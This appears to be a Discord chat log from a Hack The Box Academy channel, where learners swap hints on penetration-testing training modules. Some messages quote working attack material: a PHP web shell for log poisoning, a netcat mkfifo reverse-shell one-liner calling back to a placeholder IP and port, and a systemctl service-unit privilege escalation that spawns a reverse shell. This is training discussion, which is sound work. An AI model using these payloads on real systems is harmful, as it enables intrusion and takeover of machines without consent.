#modules

Was there something done to the VM's? Every time I try to alter the URL or do any action apart from opening the normal page I just get errors nowadays:

I have to reset the target URL if I do anything:

And the timer goes down from 90 minutes to 3 minutes in 30 seconds, is this normal ?

resetting, and the time left is 79 minutes down from 90 minutes in 1 second:

happens to me a lot as well 😦

Hello, everyone! I'm new. I can't wait to get home to check HTB out 😁

@late sail have fun 👍

Thx ☺️

Hi everyone 🙂

was wondering if there was anyone I can msg about the last part of common applications - skills assessment 1

Did you find a solution to this? i'm having the same issue.

Hi Everyone! I am new to this. Please share some wisdom with me! 😁

hi all, we've added a new section Pillaging to the Windows Privilege Escalation module: https://academy.hackthebox.com/module/67/section/1637 it's a fun section created by @mild mango and I recommend checking it out if you've already finished the section.

Hi guys, I'm stuck at the File Inclusions Skills Assessment. I have found ||the admin panel||, and I'm trying to ||poison the logs|| with ||a Host header <?php system($_GET['cmd']); ?>, then trying to run commands like ?log=system.log&cmd=id. I also tried the other logs, http.log and chat.log||, but nothing works. Am I on the right track with this?

hey man i have just finished it... i think log poisoning with that command wont work restart the server and instead of "$get cmd" you could use "ls /"

you can find the result of ls / in the nginx log

also have you been able to find the lfi? @solar granite

Yep, that's how I found the ||admin portal||

also the command you are trying to run "?log=system.log&cmd=id" is wrong

What's the right one?

you need to dig more, you need to find the lfi of the admin portal

/var/log/nging/access.log

Thats what u pooling for

Looking

Right, I figured the logs in the portal are different from normal logs, but not why.

Thank guys, I'll check it out again later

Hi, Can any help me. I'm lost( Footprinting Lab - Medium) in the database(SQL Server Management Studio) don't know how to find the password.

Hi friends --
I am working through the "Active Directory Enumeration & Attacks" course on Academy. I am stuck at this question:

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

The powershell command seems to time out. As a result, I am using Bloodhound but the two permissions I see are invalid answers. I understand the "ObjectAceType" is different than the "ActiveDirectoryRights" but cannot seem to get the correct answer. I am guessing I am missing something small.

Here's the URL for reference: https://academy.hackthebox.com/module/143/section/1485

@buoyant drum what is the problem

I have loged into SQL Server Management Studio but I can't find the password for the user "HTB".

I'm kinda lost. Need some hints about database name or path to the password.

You will find it, just keep searching for HTB

Thanks. I’ll let you know.

i need to get from a file the pattern i specify and after that until the last / of the line, so basically from a point to another point of a file. How to?

yay... finally done with Linux Privilege Escalation 🙂

I suck at privesc

@queen gazelle DM me 😉

Having some trouble figuring out "Using Web Proxies - Encoding/Decoding"

Could anyone give me a little nudge?

i believe we have to|| base64 decode three times and then do some more decoding||

yeah you do that and you start getting something that doesn't look like b64 anymore

guys. where are the instruction for the windows fundamentals skill assessment? like where do i create the new user for thats needed? wherre do i add them to group?

i don't remember them being the "lectures'

we should be able to spawn a target machine and then RDP to it

yes i can do that but the skill assessment says i need to set up a few things and i don't know where

yes that's the challenge 😉

then google gonna be my friend again lol

Google's everyone's friend!

Invaluable hacker tool!

always be ready to use outside resources... many of our modules are "mostly guided" but there are absolutely times where we will make you do research on your own. Not sure if that's the case for Windows Fundamentals as I did that module like 11 months ago and can't remember lol

well i just went through the module and haven't find the info for where to create the user so im just gonna go with google noww and see what happenes

what up @west canopy !! How have you been bro?

living the dream dawg 🙂

lol i feel ya

Hello all,

I'm new to this and working my way through the beginning modules.

In the Web Enumeration module it says to add a DNS Server such as 1.1.1.1 to the etc/resolv.conf file. What is the purpose of this?

Thank you

Thats cloudfares right?

For example 8.8.8.8 is foogle dns

that would only be necessary if you're having some sort of DNS issue

no need to edit anything on PwnBox

Isnt also contributing to anonimity?

Broken Auth - Brute forcing Cookies -> "Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user."

What the heck is the username? Seriously, I've tried every admin name I can think of and none work. I even tried "Super User" and it says, "Unfortunately, as Super User you dont have any flag." This is the permission you told me to use!!!!

actually it says "as A" super user. not as super user. But dm me and I can help

^ can someone dm me I still haven't found it.

Thanks @silver zenith & @west canopy.

These modules and the vagueness/inaccuracies of the hints or what they're looking for, is getting extremely tiresome.

hey. im doin the bash scripting module. could someone whos knows it PM me?

the question is
Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer.
and i got a number but it is not accepted as the correct answer

Have you considered that indexes start at 0 and not 1 ?

well the counter start from 1 not 0

but i'll check

No worries ^^

Let us know how it goes for you

yup you were right

should have thought about that

Well done !

Where is the password for the MSSQLSVC user found - Attacking Common Services - Attacking SQL DB's

I'm tired of going in circles

||look into unc path injection||

Can't help but just wanted to say it's cool to see you here too lol

I googled it and someone mentioned it was "super", which worked! I find some of these modules punish you on trivial things, even though you fully grasp the content that was taught

https://tenor.com/view/forrest-gump-hello-wave-hi-waving-gif-22571528

Yooooooo! Good to virtually see you!

guys. how do i check if a string contains another string in bash?

should i just go through the string char by char and check it? or is there an easier way?

what question are you working on

Comparison operators?

Can someone help me with 'FILE INCLUSION' Second assignment: Basic Bypasses | Everything I try, seems to give me 'Illegal Path Specified!'

yup. do you have any idea?

I do, dm me and we can see what you have so far and what you need

make sure you are using the right path ||/index.php?language=languages||

Has anyone experience with the STACK-BASED BUFFER OVERFLOWS ON LINUX X86 module? I stuck by the TAKE CONTROL OF EIP part. I dont know at wich point I need to take the EBP. Does anyone know?

It's the one! I've tried all the options given in the instructions and even combined them, while URL encoding everything and I still only get illegal path

DM me 😉

Can anyone provide some guidance on the File Transfers, Window File Transfer methods first question?

use wget

dm me

Little embarrassed as this shouldn't be stumping me but I use that. Shouldn't the command be ||wget http://(IP)/flag.txt?||

exactly

Weird, I did that command earlier and didn't work, must've been something on my end. Thank you.

Dm

can someone help me with command injection skill assesment. I get bad request

dm me

Hey guys, stuck at intro to network analysis - tcpdump fundamentals

question 1 & qs 4

Could I have some help on the footprinting Snmp section?

Find it a bit confusing

I would say Cpts goes over much more information than OSCP. I haven't done OSCP but looking at the syllabuses of both it looks like HTB goes much much deeper. CPTS can be a good way to prepare, but you might also need to do the buffer overflow modules and the corporate osint module.

so i can't find my note on this module but for question 1 check the first line of the images and for question 4 hint you will need ||2|| tag and you have to include sudo tcpdump in the answer

I completed the module, what is it that you are stuck on?

can I dm you?

sure

Hey @tranquil zodiac! You are correct -- I am sitting for the OSCP on December 8th. To be honest, I am really dissappointed with Offensive Security as an organization. I paid $1,500 for 90 days of access to the PEN-200 course and their labs. The course itself is just a large, outdated .pdf which does a terrible job at teaching the concepts. The labs are shared between ALL students so you don't even get dedicated VMs even though I am paying $500/month. Their new "flag submission" process is just a sub-par version of TryHackMe or HackTheBox.

I am still planning on passing the OSCP due to the name recognition but I sincerely hope orgs such as HTB, THM, and TCM Security begin taking over. Offsec has turned into a greedy organization with bad infrastructure and terrible support

Nevermind. It was pretty easy.

HTB Academy has been excellent. I am working through the AD Enumeration & Attacks course. It's really really good. This is what I was expecting from PEN-200. I cannot say with certainty if it will prepare me for the OSCP simply because I have not taken it yet... But I CAN say it will do a better job than the $1,500 bloated PDF that Offsec gives you.

Holy shit based as Fuck

I like hackthebox because the price is very reasonable

especially if you are a university student

amazing bang for buck

Lel, I am stuck on how to properly upload a zip file to my target machine on the File Transfer Windows section. Any help? I tried using wget post method however the file is empty on the target machine.

HTB has taught me more than my university haha

Same haha

I really hope hackthebox academy adds some more certs, and fixes some of the modules/sections. Because if that happens it will be by far the best place to learn hacking.

Currently working towards the new Penetration tester specialist cert

Yeah, academy is solid. I honestly cannot describe how terrible the Offensive Security teaching and infrastructure is compared to HackTheBox. It's night and day. As a student, you get access to a forum that's full of weird riddles because you're not allowed to give any type of spoiler. The organization's motto is "Try Harder" because they suck at actually teaching concepts so they push the blame onto the students. I'm really hoping I pass the OSCP so I can make a video on my YouTube page explaining all of this without looking like a sore loser 😄

I'm so glad I am doing academy instead of OSCP

Shameless plug but if you want to follow my journey, I am documenting the process on my page -- https://www.youtube.com/c/TylerRamsbey

Hey guys how to join in HTB CTFs

😐😐I am unable to join

Glad you are enjoying the content 😉

Agreed. I think they got a bit comfortable being the only practical security cert for so long.

yooo what's up @unique valve

Could someone help me out, I'm on the Shells & payloads 2nd host || I found the exploit it wants you to upload on to the server but when I add it to the metasploit folder I can't find it to start the exploit||

Try selecting the exploit even though its not showing when you try to search for it.

Sup my guy!

How do I do that?

Hey all, is there any modules focusing on jwt attacks? I'm working on some challenges related to jwt attacks, and don't find much on HTB acad sadly. Already tried a lot of stuff (none alg, alg confusion, playing with self-signing JWS, JKU, lfi/sqli with KID etc...) but can't manage to solve this chall, so if you have any ressources or knowledge to share i'd like to take it 😄

nothing on json web tokens in academy but i am fairly certain we have something coming soon, I can check with zeyad

nvm I figured it out 🤦‍♂️

In msf type "use <path to exploit module>"

okey thanks for letting me know

Are you able to run the exploit for host 2?

|| I got an error with the script, going to double check if maybe how I passed it to the host failed ||

I found the exploit it wanted however when I loaded it into metasploit, fill out the options, and run it I receive an error.

Subscribed! By the way this is actually the type of content that I find useful... can't stand stuff from big Youtubers "HACKING WIFI HAS NEVER BEEN THIS EASY" gtfo lmao

I received the same issue. Got frustrated and decided to work on another module for the time being lol.

looks good, found already a vid that i want to watch:)!

has anyone completed the attacking enterprise networks module? struggling with it

where are you struggling my dear?

not sure how to do this "Perform a banner grab of the services listening on the target host and find a non-standard service banner. "

i tried a command line including dimtry -pb but had no luck

i think I was able to get it with nmap -A

which section and question #?

first section first question?

Really think they should add a section for this in one of the web modules

I was doing the Box "Secret" and had no idea wtf a JWT was

its coming very soon I just got confirmation

not even BSing you lol

external information gathering and question #1

thank you!

Anyone new that what's to learn with me?

Could someone lend me a hand on box 2 of Shells & payloads? || i'm trying to run the metasploit and i've set the vhost to 172.16.1.12:80 but I still can't get it to execute||

try setting it to the ||subdomain "blog.inlanefreight.local"||

|| ughhh that worked thanks 😂 I was so close ||

oh btw i also need help with that section but on question 3, i have no idea what subdomain that question want

sec I will DM

sure thanks

hello folks, 2 more and i finish my BBH path. Server Side Attacks done and easier than i tought https://academy.hackthebox.com/achievement/433014/145

fantastic!!!

Thanks a lot again @vital adder ans @lethal atlas for help me with the Broken Authentication where i lost so much time stuck

is kali linux free ?

Yes

no the license is 69 USD

He is kidding about that

its 1 bitcoin

hello everbody
when i upload: <?php system($_GET['cmd']);?> for a reverse shell, and after do cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc MYIP PORT >/tmp/f (in burp with url encoding)

shouldn't I be able to gain a reverse shell with netcat?

if after you upload that and you can run command and also the target machine have netcat installed then yes i think you should be able to get a rev shell

ah thanks... you might have helped me where the problem is ;)!

How can I pass a base 64 string to windows then have it output it as a bat?

folks, Once I sign up on the HTB Academy with my student account, is there a limit till when the student account will remain active or will it remain active till the time that particular E-Mail is functioning?

i think the only time its gonna be deactivated is when you email account is deleted or if you don't pay for a few months.

could someone help me with the bash scripting module. im kinda stuck at the flow control - loops part.i don't know much about bash

Can I speak to someone about getting stucked in Footprinting module?

i am pretty dumb at bash too but if you need help shoot dm me with your script

sure what's issue?

can I talk to you in private?

sure

Does anybody else have issues with getting disconnected from the connection pack constantly when working with modules?

Dont know

I do eveytong on pwnbox

Omg

Fqdn

Must give some respect to htb staff. Im really enjoying this platform. Academy is freaking awesome

Even with easy modules i knew pretty good i am still learning new things

same, its a joy

Ot is kindoff inspiring

Yes we love to hear this!!! A lot of love goes into our content 😉

yo guys, I have a question... I'm about to have my first contact with HTB and I don't know what to pick between TCP or UDP at the ovpn... wouldn't it be a no brainer to pick TCP?

anyone do this part in attacking enterprise networks "Perform a DNS Zone Transfer against the target and find a flag. Submit the flag value as your answer (flag format: HTB{ })." .. im trying to use dig (my target IP) -t ns

you are basically using dig to find the ns record not a zone transfer

what would be a better command? still using dig?

a better command would be the zone transfer command

you can use google or the example command for that

yeah google told me to use that command i first tried

oh yea you can use the ns subdomain for the zone transfer or you can just use the target ip both work fine for me

okay i guess im just confused what im looking for and what HTB wants for the answer

HTB{qraardra}

the qr ra rd ra is the only flag i can find

hint try the give example dig command

thank you!

Attacking Enterprise Networks is the capstone module of the Pentester path. Have you done any of the other modules?

So I just finished the Shells & Payloads Module and for host 3 || I was able to successfully complete it with the intended Metasploit module but I'm curious about going about another way. || || I was able to get a webshell on it but it only got me to have www user access, how would you go from there and escalate yourself to full privileges? I was thinking I could use mscvenom to make a package then push it on to the host via my webshell then use the reverse shell for a more stronger attack interface. || I'm just curious if anyone else had a more unique solution

Struggling to pull a file from an RDP session within one of the modules, could anybody possibly assist?

Got a question about the public exploits bit for the getting started module. I have the target IP, I'm pretty sure I know what I need to be searching for for searchsploit, but there's so many options and after that, no idea how I'm supposed to find the right one for metasploit considering there's multiple options for that too

or maybe the answer lies with the error I get when running nmap that says that 1 service unrecognized despite returning data

sometimes ya just pick one to investigate and go for it. But ideally youre gunna wanna try specific version numbers if you can

I might be missing something because doing a search with the specific version number brings up one result, but I'm unsure where to go from there

read about the result

I don't see how to take the info I get with searchsploit and apply it to metasploit, if that makes sense. I've googled the service plus version to see about exploits and I've found some but I don't understand how to apply that to metasploit to advance with the problem. In the example for the module, they just googled and got the name of an exploit to search. That isn't the case here

have you tried the msfconsole search functions to find the module listed by your searchsploit result?

presuming your result was a .rb metasploit module

the result was not a .rb, but a .txt. Do I need to be keeping an eye out for a .rb result with searchsploit?

if you want to use metasploit yeah. But if you got a .txt you should read it, not all exploits need to be used with metasploit

it could be something simple that can be done by hand

but that module probably does want you to use metasploit for this first one. So dont be afraid to search for other service versions you find to see if something easier reveals itself

I'm wondering if that unrecognized service has anything to do with the answer because it feels like I'm running in circles, unless there's a sudden spike in the learning curve all of a sudden. All previous questions have been solved with a few minutes of rereading the content on the page, at most

I'm having the issue with trying to change the passwd for the admin acct, were you able to figure out?

Yes. Did you get the ||UID and Token|| of the admin account?

You can include a drive like this

xfreerdp /u:username /p:password /v:IP /drive:data,/tmp

hi

alright so, just to confirm I'm not on some wild goose chase and I'm actually on the right track, nmap shows two ports open and one service unrecognized despite returning data. One of them is the domain service, while the other is http with Apache httpd 2.4.41 ((Ubuntu)). It's the latter I want to search for exploits, ye?

Dont remember off the top of my head. Its worth checking out the web server there though, it definitely could be running a web app that could be the target you need to exploit.

I remember a couple of the pages in that module requiring that

and how would I go about doing so?

Open a browser

and use your eyeballs to see whats there

alright figured lol. I just want to make sure I'm not missing anything

You won't know without checking

enumeration is like 80% of hacking

any one on now that's done password attacks module - hard assessment give me a tip or hint? Haven't made any progress yet into this assesment. Used hydra on some services and it was giving false positives and right now brute forcing smb with crackmap.

are you scanning for the right user, and are you using the basic wordlist or the modified rulelist with the custom rules.

in the assessment scenario description they give you a username johanna. So been using that as the user name and bruteforcing with mut_wordlist with custom rules and rockyou.

Then youre on the right path

but I dont think you need rockyou

cool guess ill just wait for crackmap then to find something

Yep thank you found Johanna creds

I'll give this a try

That worked, thanks!

I feel dumb, I can't get gobuster to run. Keep's timing out and I'm certain it's because I dont have the url scheme correct. The frustrating part is I got it working earlier lol

Let's see your command.

gobuster dir -u http://46.101.17.112:32316 -w /usr/share/dirb/wordlists/common.txt

Like I said, I'm certain it's something simple I'm just missing. I'm long due for a break, but I'm so close to cracking this module problem

do you get an error message? The command seems to look good to me at first glance.

Error: error on running gobuster: unable to connect to http://46.101.17.112:32316/: Get "http://46.101.17.112:32316/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

url is fine because it brings up the webpage in a browser

gonna try restarting the VM and seeing if that helps

sanity check 1. sure its http and not https

webpage has the lock crossed out, which indicates http, no?

idk I never pay attention to the lock I just look at the url and see if http proto is being used or https proto

it's http. Technically just shows the IP because target, but copy paste has http

http://46.101.17.112:32316/

mmkay then yeah your command looks sane so idk

same error. hmmmm

wait, hang on, might just be dumb. Was the wrong IP

well thatd do it

the trappings of using up arrow to retry code

annd correct ip, same error

is the correct ip http or https 😂

gobuster dir -u http://46.101.17.112:32316/ -w /usr/share/dirb/wordlists/common.txt

might be time to look into how to use ffuf

are you able to curl the page

....huh, curling brings me to to the default welcome page used to test the correct operation of the apache2 server

well its something

okay there we go. I just entered something wrong. Copying and pasting the url from the browser for curl does indeed bring me to the wordpress page

maybe just latency screwing you some then for gobuster

could be. So a "try again later" deal?

use the --timeout flag to give it some extra time

that worked

latency it is then

Might be time to restart the router lol

Ive noticed that golangs default socket timeouts tend to be pretty punishing

im 80% sure its why amass doesnt work with tor and it baffles me they dont have a timeout flag

welp solved the problem. I was overthinking things WAY too much, but it lead to some trobleshooting and research practice, which I feel I'm gonna need in the future. So can't complain too much

this has also made me realize I can't wait for cyber monday to nab a pair of monitors. One screen, even if it's a tv, isn't enough lol

In password hacking hard lab - are we supposed to ||mount the bitlocker vhd file using guest mount and then pass in the passphrase to unlock it? I cracked the password to it but cannot get it to mount for the life of me||?

Yes

you can also try mounting it in a windows install too

except I dont think guestmount worked for me, pretty sure I used something else, idr

Yeah I was having zero luck with it

I remember spending like a solid half hour googling things to get it to mount

oh just remember what I used

ntfs-3g

google that and some relevant additions and youll find what you need

Appreciate it, I'll give it a chance

hi someone help me with Linux Local Privilege Escalation

What’s your question?

Need help 🙂

**Path **: Penetration Tester
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section:Password Spraying - Making a Target User List
Question: Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmitht.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?
https://academy.hackthebox.com/module/143/section/1455

Command executed:|| kerbrute userenum -d inlanefreight.local --dc 10.129.22.219:3389 jsmith.txt||
This IP|| 10.129.22.219|| was generated by htb and logged in as ssh

Idk what I'm missing? getting error with this command

I ended up mounting this and cracking the sam hash, how do I determine which service the creds are used for?

you try em!

Is anyone available to help on the Nibbles module ?

I cant upload the image.php file through the image uploader on the blog by using msfconsole and using the exploit. Ive researched the problem I am having and it seems common. I just havent had a solution that works for me.

here is the error im getting

[!] This exploit may require manual cleanup of 'image.php' on the target

Lol I figured it out. Man its always so simple. Just had to fill out all the fields.....duh

Hey all, having some issues with the Linux Fundamentals module

Currently i'm VPNed into the Academy through the .ovpn file provided when you click Get VPN Key

It's asking me to ssh into a machine with the given credentials, however when i run ssh htb-student@<machine address> i get a Connection Timeout in return

just checking, to connect to vpn you used sudo openvpn, and you left the terminal tab open yes?

I did sudo openvpn academy.ovpn and yes i left the window open

okay thats weird 😅

try regenerating the vpn

Gave that a try, no dice

you are working on windows or system based on linux

System based on Linux

My whole system setup is a bit of a cluster<bad word> though

I see, actually i did that module yesterday and i didnt have any problems, let me check again if there something that you are missing

If it's relevant, this is what i'm seeing

Working for me, the only thing that I think is happen is that your target (time left) is over so you need to reset target.

Just regenned the target and still nothing

ping 10.129.102.63
PING 10.129.102.63 (10.129.102.63) 56(84) bytes of data.
^C
--- 10.129.102.63 ping statistics ---
8 packets transmitted, 0 received, 100% packet loss, time 7012ms

Well that'd explain a lot

yep, that explain all xd

The machine has to be online otherwise i'd get a Destination Host Unreachable right?

Yes

So the machine's online just not responding to anything

ip addr, ensure you ahve the connection to the vpn working

15: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.14.151/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::1095/64 scope global 
       valid_lft forever preferred_lft forever

So weird

Perhaps its my system itself

It's Android 10 with LineageOS 17.1 running a Kali NetHunter chroot so maybe the host OS doesn't like routing traffic through the tunnel

could be, I running a vm on windows, that vm is a kali linux and I dont have any problem :/

Actually no that cant be the issue

Android itself recognizes tun0

thanks for the tip. I just solved it. One question btw, typically we use common.txt or small-2.3-txt to search for hidden files. but here its in some number.html file, in the real world are we expecting this ? Im new to cybersec sorry for the silly question.

we can expect something in realworld too but in terms of other file extensions like pdfs etc

how to learn everything from scratch ?

hello evryone please can someone help with the file inclusion module final assessment ??

thanks

Did you carry it out form the attack machine? Its the intended solution and in that case you can just use dc 172.16.5.5 like the example shown I believe. You'll also have to be in the directory of jsmith.txt file in your command.

Is anyone else having issues with the Active Directory enumeration and attacks lab? Since yesterday I keep on getting a 'system error 110: Connection timed' out on both VM and Pwnbox when RDPing in to the attack machine.

Hi guys, need some help with File Inclusion skills assessment. I got the ||admin portal||, found the lfi there, and I can access files on the system. I'm now trying to ||poison the logs with curl -s "http://IP/ilf_admin/index.php" -A '<?php system($_GET["cmd"]); ?>'||, but it doesn't show up in the logs. I then try to execute commands with ||http://SNIP/access.log&cmd=id||, but I don't get the output of my command anywhere

Edit: I also tried executing commands like ||curl -s "http://IP/ilf_admin/index.php" -A '<?php system("id"); ?>'|| but it doesn't work either

Edit2: be mindful of quotes usage. It works with ', but not with " in the payload. Also make sure your payload is ||just a command you want executed, not the $_GET... thing, as it never worked for me||

I'm not sure about this excercise but you should put an ? After your .log instead of &

poison /proc/self/environ

And see results on log files

Can I break the webapp by doing it wrong? After a few unsuccessful payloads it seems to not log anything anymore
I'm trying it like curl -s "http://IP/ilf_admin/index.php?log=../../../../../proc/self/environ" -A '<?php system("id"); ?>', and /proc/self/environ gets www written inside, then it stops logging requests

I'm using & because there's already an ?
Accessing the logs is like index.php?log=...&cmd=id

@solar granite i had this issue, after some time/logs it stopped from loggin

What if you just send your payload as a parameter in your url

Still doesn't work, I try /index.php?log=%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%22%63%6d%64%22%5d%29%3b%20%3f%3e (which is <?php system($_GET["cmd"]); ?> url-encoded). Then I try to access it like index.php?log=../../../../../var/log/nginx/access.log&cmd=id, but I don't get code execution

It does get logged tho, the requests appear in access.log

Update: it works with ', but not with " in the payload

Solved

hello hello hello

Anyone in the academy on module 18, the Linux fundamentals?

I am trying to exploit a Stack-based buffer overflow the shellcode is in the pics. But if I try to run the command in gdb and setting up the netcat listening on the same port I dont get any response in the netcat log. is the shellcode right? Or is something else the problem?

Anyone for the last section on attacking common applications ?

ohh that makes sense. I didn't do it from the attack machine. It worked now thanks!

shoot me a dm if you still need help with that

what's the issue?

long time no see @vital adder

Hi, I need help on Password Attacks/Password Mutations. I've tried many things to reduce the list but without success

if it's taking too long cut the first ||17000|| password

Thanks. it works. I thought the solution was a clever way to reduce the list, not a random magic number.

if you include & after your openvpn command you can close the window and still keep your vpn connection. Just an FYI

@hexed bison try using the sed commands on the examples to let only the passwords that are policy compliant. Try my script that i shared here in the channel to achieve the same results. Around 14k passwords to test

And do not try the mangling option. You'll not need it 😉

I think this is the problem : I do not know what the policy is

@hexed bison the same as in the examples. Otherwise, try to create a new account and check the requirements

Besides when you find out the first web creds, they suggest you to change your password and they set you the policy

I think we are not speaking about the same section

I speak of skill assesement on the module

The sections will be solved just repeating the steps of the section

Anyone able to help with SQLMap Essentials: 'Running SQL Map on an HTTP Request' question 2? The hint says "Try to see where the 'id=1' is sent, and specify this location as the injection mark." I have no idea where to even start. Maybe it's just a Friday thing, but I'm throwing commands at the wall.

i'm speaking about the 5th section of the module, and no information about policy and no web server to connect to. Only a user login and some files

but Thank you, I'll use it later

@simple dragon inspect the request and add an * next to the id=1

got it. thanks!

Hello, Is there any free learning path blog for HTB the one similar to THM?

So far no luck thanks!

nope for htb academy the only free module is the tier 0 module

Hey all! I'm having problems with password attack lab - hard. I was able to find ||Johanna|| creds, download ||keepas|| file, crack ||keepas|| file, get ||David|| creds, log into ||smb|| and get .||vhd||, crack .||vhd|| and obtain the cred (warning hudge spoiler -->) ||123456789!||. I upload to ||Johanna|| windows session the .||vhd|| file to open with the cred I found but doesn't work. Any hint please?

oh you don't have permissions do mount stuff in the target machine

mount the ||.vhd|| file on your machine (guestmount don't work)

I tried with virtualbox. I used .||vhd|| to boot the machine but doesn't work. I'm doing wrong?

oh no this isn't a virtual machine drive this is just a ||bitlocker encrypted partition||

you can just mount this on your windows

Rigth. I'm stupid jajaja

Thanks bro

Ah I see thanks!

question about the Bug Bounty Hunter certification exam. Was the exam content outsourced, or was it done in house?

done in house afaik

@thorny glade i've tried both and i prefer HTB by far, in THM the content is too spilled. It os hard to follow a thread of knowledge. Not like HTB. You can look on Portswigger also

find / -user root -perm -4000 -exec ls -ldb {} \;
``` I used this to find files that belongs to root and i have access too.. that are executable

priv=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f"
[Install]
WantedBy=multi-user.target' >$priv
/bin/systemctl link $priv
/bin/systemctl enable --now $priv

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File Inclusion/README.md#lfi-to-rce-via-procselfenviron

@solar granite pass get paramater in system command and see results on log files, thats what I did

Thanks. I came to the same solution after a while. I was trying it with " (double quotes) instead of ' (single quote) as well, which didn't work and took me forever to figure out

Completed the assessment?

Yes

ok now that I know the answer there is finally a clever way to do it. there are 3 ways to increase the requests/m. When you use a tool for the first time you should be curious. when you encounter a target for the first time you should be curious

is there anyone else that has issues with the Help message box??

I am in the Linux Privilege Escalation Module on the Special Permissions section. I am trying to answer the question asking for the file where setuid bit is set. I am trying to submit a file name, path, and everything but I can't seem to get it right. Can somebody point me in the right direction of what I am supposed to be submitting?

Does HTB start assuming no knowledge, or do I need to know any languages before I start?

yep DM me 😉

do you mean like programming languages?

Yea

nope no programming knowledge is needed

you'll be using bash and python scripts, some modules absolutely require SCRIPTING knowledge

Cool, I have another question, does the skills on the course apply to malicious hacking, like the stuff that most people would think of if you said hacking? Or is that done differently to this?

Academy at the moment is mostly focused on pentesting web and infrastructure.

we certainly hope you choose to be ethical 😉

I sent you a DM Jared

the training we offer is agnostic, how you choose to use it is up to you. But yes you will absolutely learn what real threat actors are doing

hi guys i am doing AD module and i am stuck on this Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group

when i do the below command i get only 2 users: kerberos and sqlqa

Get-ADUser -Filter "adminCount -eq '1'" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl

any advise?

Oh I did not realise, so hacking training is available freely, you just trust everyone

Oh duly noted, thanks!

The process of attacking networks and the process of protecting networks are similar.. Making the cybersecurity landscape as transparent as possible actually increases security.

I'm doing cracking the box, knowledge check. I finally got root access using php to exec('/bin/bash'), but the terminal shows no output for anything I do.

Theres many ways bad guys can go about learning stuff and theyll keep nuggets of info secret amongst their friends and associates as much as possible. Making hacking knowledge as widespread as possible sure increases the amount of bad actors out there, but it dramatically increases the number of good actors as well, far more than the downside.

There are some differences between whats taught in academy and say malicious hacking though. But that mostly boils down to the fact that good guys dont need to worry about attribution or opsec as much(in the sense that the main opsec considerations for good guys are preserving client data and secrets during an engagement).

Bad actors also often have more time to play with, which means they can opt for slower, stealthier, more methodical approaches(which can be a requirement for avoiding said attribution and getting caught.)

pentesting and irl hacking a little different but similar

like a good guy doing a bug bounty program can just fire up their browser and burp and just go for it. A bad guy is going to have to chain stuff through tor and proxies, go slower due to increased latency, and also must be able to leverage findings deeper. All of which is going to affect their tactics techniques and procedures

Could I have help with footprinting lab - hard

Don't know what exactly is the community SNMP string

community default is public, otherwise brute it

I bruted it with onesixtyone

then use it with some of the recommended tools for enumerating snmp from the module on it

fair warning its a ton of text and is basically like looking for a needle in a haystack but youll know what youre looking for when you see it

Im using snmpwalk but don't know if I should use the full string

For example should the community string look like ""Linux htb 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 x86_64"?

?

thats not something you need to input at all, so not sure what youre asking

do you know what is the basis for the recommendation of boxes when you finish a module? I can't find the relationship between the Network enumeration with nmap module and the suggested boxes.

id recommend rereading the snmp page. The actions you need to preform are nearly copy paste right from the examples

snmpwalk -v2c -c <??????> <fqdn/ip>

if that makes sense

oh i wasn't able to get snmpwalk to work for me in this part but you can hint you can use a different tool show in the snmp section

also snmpwalk -v2 is for version 2

any advise on this?

Ok that makes much more sense

Deleted in case someone else searches this topic

I dont mind dropping an answer when its literally right in front of you but just dont know what part of the output is relevant lol

would recommend deleting your image as well to avoid spoiling someone else either

I will

Not helpful but to not leave ya hanging, havnt done that module yet so not much advice I can give, other then you can use another command to list users in the protected users group and then just cross-reference them.

https://everythingsysadmin.wordpress.com/2013/07/16/detecting-members-of-protected-groups-within-ad/

thanks, also with those commands i get the same: krbgt and sqlqa

then sounds like youve got two users that are valid

yeah i have tried both of them but i get wrong answer

with the following command:
PS C:\Users\htb-student> Get-ADUser -LDAPFilter "(admincount=1)" -Properties * | where servicePrincipalName -ne $null | select name

name

krbtgt
sqlqa

try without the where servicePrincpalName and just see what users you have that fall under the protected on in the first place

PS C:\Users\htb-student> Get-ADUser -LDAPFilter "(admincount=1)" | select SamAccountName

SamAccountName

Administrator
krbtgt
daniel.carter
sqlqa
svc-backup
svc-secops
cliff.moore
svc-ata
svc-sccm
mrb3n
sarah.lafferty
jenna.smith
harry.jones
trisha.duran
pixis
Cry0l1t3
knightmare

got this and i have tried all of them

but no lock

luck

¯_(ツ)_/¯

Maybe ill be of better help when I get there. I think its the module after the one Im currently on. But hopefully youll get past this by then.

@west canopy i'm sorry but i do not agree with the statement of we do not need any programming knowledge to start. It is true that they give you many examples of the scripts needed but... Someone with no idea of what the script does like @craggy kernel probably will struggle a lot to complete even the sections of the academy on middle difficulty.

Is it free to host a CTF event in hackthebox CTF platform?

right but the content is mostly guided, if you have to use a python or bash script we show a sample command

so its not actual programming

just knowing linux to use the scripts

or modifying a script. Script modification is not the same as knowing a programming language

I would say a basic understanding of what the scripts are doing. I tell it because i have people asking me things like what does the scripts on the idoor sections. I mean it is the most basic, a loop and calling a curl on every cycle but even that they do not understand it

depends on the module right

which I think i said , some modules absolutely require scripting knowledge

Theres also a difference between not needing to know any to start, and never picking any up on the way.

You need to eventually learn some scripting at a minimum, its unavoidable

not me, whenever I look at bash I faint

